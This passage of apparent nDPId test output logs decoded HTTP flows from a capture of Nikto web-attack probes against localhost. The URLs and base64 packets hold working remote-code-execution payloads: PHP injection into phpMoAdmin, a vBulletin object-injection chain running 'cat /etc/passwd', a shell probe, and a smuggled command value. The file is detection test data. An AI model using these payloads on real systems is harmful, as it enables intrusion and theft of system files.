bS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
01388{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
